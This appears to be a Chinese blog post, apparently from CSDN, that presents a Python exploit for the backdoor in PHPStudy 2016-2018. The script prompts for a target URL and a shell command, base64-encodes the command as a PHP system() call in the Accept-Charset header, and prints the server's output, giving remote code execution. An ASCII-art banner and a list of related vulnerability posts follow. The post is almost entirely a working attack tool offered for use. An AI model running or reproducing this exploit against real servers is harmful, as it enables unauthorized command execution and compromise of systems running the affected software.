[2016-2018]phpstudy的exp制作

[2016-2018]phpstudy的exp制作

用python的requests模块进行编写

修改请求数据包进行远程代码执行

python 复制代码
import requests
import base64
def remove_code_execute():
    try:
        url = input("请输入要测试的网址:")
        cmd = input("想要执行的命令:")
        cmd = f"system('{cmd}');"
        cmd = base64.b64encode(cmd.encode()).decode()

        headers={
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36",
            "accept-encoding": "gzip,deflate",
            "accept-charset": f"{cmd}"
        }
        response = requests.get(url=url,headers=headers)
        relust=response.content.decode("GBK")[:response.content.decode("GBK").find("<!D"):1]
    except Exception:
        print("请检查是否是url错误或者命令错误")
        print("请检查操作系统和命令是否匹配")
    else:
        print(f"命令执行结果:\n{relust}")
print("""
        PHPStudy_2016-2018

.............................................:.:..............................................tt,..t
..........................................:tfjjjft:...........................................itt::.
.........................................;fLLLGGLfjt,:.........................................;tj,.
.........:.:.....:.....................:;fLLGGDDGLLfjt:.........................................;ttt
......:.... ........... ...............,fLGGGDEEDGGGGf,..........................................,tt
..##i###.  W:::...L...jjLKff...........:fGDDDDDEDDGGGL,......:. . ...;D.....::...:,:...:....:..t....
..f..L##.# ::.#####WW.itEii ............LDDDGGGjLDEDGfj......jf.,,E L.W##K##W#W#itWjfft#W###Wif#fjjt
...i.jE,:j:iG .:..W...;;D;;;............LGDDDGLjjGEDfi:......# .. D.#L,#::.,Df.::::.K..:iLE...,. G..
...#.. ,.f.jL.,:.#::. .:E...............iGDDDGLfGDDL..........#.::,D#.E#G..#.K.. #L###..#.#:..#EWW#.
..i:fLf,:Lt:L.W E: G.:.:ji::...........:.tGjGGfjLfjf..........;:..L:#: #.;W#####tK..K:.######j#.:D:.
.. ...##.f.##.:#: j.;;#: :K#..............Liiii;tit:........ #..:.E.#i:W.,:.#iW::W,:K,,:.#tE::#,;D:,
........................................jKi;ii;,iit.............,i. G:t,.:D:...j.L.....D:...;.L.....
......................................DEWKKjiiijti..................:.:....:... .:......:.....::....
.....................................:EKKWWEijLfftL,i................ .....:. :.....................
.................................jKKD::KKWWKGtjjtDW:fE,.......####.:..#.. .:t.E.....................
................................iKKKKD:DWWWWWf;itWKL:KKG:.....WWWK.,ii#iit...,:.....................
...............................:KKKKKKiiWWKWWWKKWWKE:KKKK:....###W....W:.:.,,;,;....................
..............................:EKKKKKKE;WWWEKWWWWWWE:KKKKK:..######..::.. :,,;,,....................
...............................KKKKKKKWiWWWWKKKWWWWD,KKKWKK...K.##K::#:L .ii;Eit....................
..............................tKKKKKWWWiWWWWWWWKKKEjfGKWWWW::L Gi,:.#:E.Dj.L;:#:....................
.............................:KKKWWKWWWjWWWWWWWWWWW;WWEWWWWK;:..:.:.:..:....:: .:...................
............................,KKWWWWWWWEKWWWWWWWWWWLjWWWWWWWKWD......................................
.........................:KKKWWWWWWWjfWWWWWWWWWWDLKW.,DWWWWWKKKKKKKG:...............................
.......................GKKKKWWWWWLiEWWWWWWWWWWt;..............:LWKKKKKKKKE:.........................
.....................:jKWKKKWWWWfiDWWWWWWWWWWG,.................:jWKKKKKKKKi........................
.....................;KKKKKWWWWLtGWWWWWWWWWWDi...................:.iKKWKKKKKG.......................
....................,EKKKKKKKWWGLWWWWWWWWWKLL:......................:fWWKKKKK.......................
...................:LKKKKWELLGLEWWWWWWWWWKEj.......................,tititLKEEj:.....................
..................:iKKKKKLfffLGEDDEKKKKEEED:......................itttiiiiL;iD......................
..................,KKKKKj.jffLLGDGGGDGGDDDEEt....................jjtttiiiij;Li......................
.................,GKKKK;::fLLGGGGGGGDGGDDDDDG,.................:.jjtLiiiittjLt......................
,:.............,GKWE;:...:GGGGGGGGGGGGGGGGGGG;..................Ljjjttttftjjfi......................
,,:...........,LWKK;:....:LGGGLLLLLLLLLLLLGLLt..................GffjjjjLjjjfLt:.....................
,,,,:........:iKKKf:......fffLLLLLLLLLLLLLLLff:.................tfLfjjfLjfffL,...............::.::..
,,,,,........,GKWWt:......fffLLLGGGLLLLLLLffffj.................:LLfffLffffL;................::.::..
,,,,,,:......,KKWWi......:ffffLGGGGGGLLLLLLffff..................;LLLLfffLLj.................::.....
,,,,,,,:...:,;;LWK;.......ffffffLLDEGDDGGLLfffji:.................iGLLLLLLt.........................
,,,,,,,,:..:i;;iii:.......fffffffLG:.DDDGLLffjjj:.................:.tLLGf:......:::.................
,,,,,,,,,::;iii,:;:.......LffffffLL..fDDGLLLffjj;..................:.:.:....:.....:.................
,,,,,,,,,,,,ii;:,;:.......;fffjjjfL...EDGGLLfjjjj.....................................::.........:..
,,,,,,,,,,,ii;,::;:........fffjjjfL...tGGGLffjjjj:............:.....................................
,,,,,,,,,,,ii,,...:........fffjjjfL...:GGGLffjjjjt................:::...............................
,,,,,,,,,,,,;;,............jfjjjjjL.....GGLLfjjjjf............:.........:.........................::
,,,,,,,,,,,,,,,............;fjjjjjf...::jGLLffjjjf......................:.........................::
,,,,,,,,,,,,,,,,:...........fjjjjjf:.....GLLffjjjj;.........:,;.WG,:j:W...........D:f. ...........::
,,,,,,,,,,,,,,,,,:..........jjjjjjj;...:.,LLffjjjjf...........:.t.::W,   ,WW#WW#,..K..:.:......:::..
,,,,,,,,,,,,,,,,,,:.........jjjjjjjj...:..tLffjjjff..........fK..#:jW..W.,.:fi:::..K..:.::...::::...



                                                    --xl
        frist : please your url
        sec   : please input your command
        """)
remove_code_execute()
相关推荐
韩曙亮5 天前
【错误记录】Android 应用漏洞修复处理 ( 动态反调试漏洞 | 调用 Debug.isDebuggerConnected 函数查询是否被动态调试 )
android·动态调试·攻击·漏洞·hook·frida·xposed
渗透测试老鸟-九青7 天前
面试经验分享 | 驻场安全服务工程师面试
经验分享·安全·面试·漏洞
渗透测试老鸟-九青10 天前
漏洞挖掘 | 记一次src挖掘-小程序敏感信息泄露
网络安全·小程序·渗透·漏洞
凝聚力安全团队11 天前
【漏洞复现】海康威视 综合安防管理平台软件 center_api_files 任意文件上传漏洞
web安全·网络安全·渗透测试·web·漏洞·漏洞复现
kali-Myon12 天前
ctfshow-web入门-命令执行(web53-web55)
前端·学习·web安全·网络安全·php·web·rce
CVE-柠檬i12 天前
Windows CSC提权漏洞复现(CVE-2024-26229)
渗透测试·黑客攻防·漏洞·cve·漏洞复现
0415i17 天前
Hack The Box-Blurry
pickle·提权·rce·hack the box·clearml·cve-2024-24590
SuperherRo19 天前
【漏洞复现】Rejetto HTTP文件服务器 未授权RCE漏洞(CVE-2024-23692)
rce·rejeto
SuperherRo21 天前
【漏洞复现】Apache OFBiz 路径遍历导致RCE漏洞(CVE-2024-36104)
rce·apache ofbiz
世界尽头与你1 个月前
域名/子域名接管漏洞
安全·web安全·网络安全·漏洞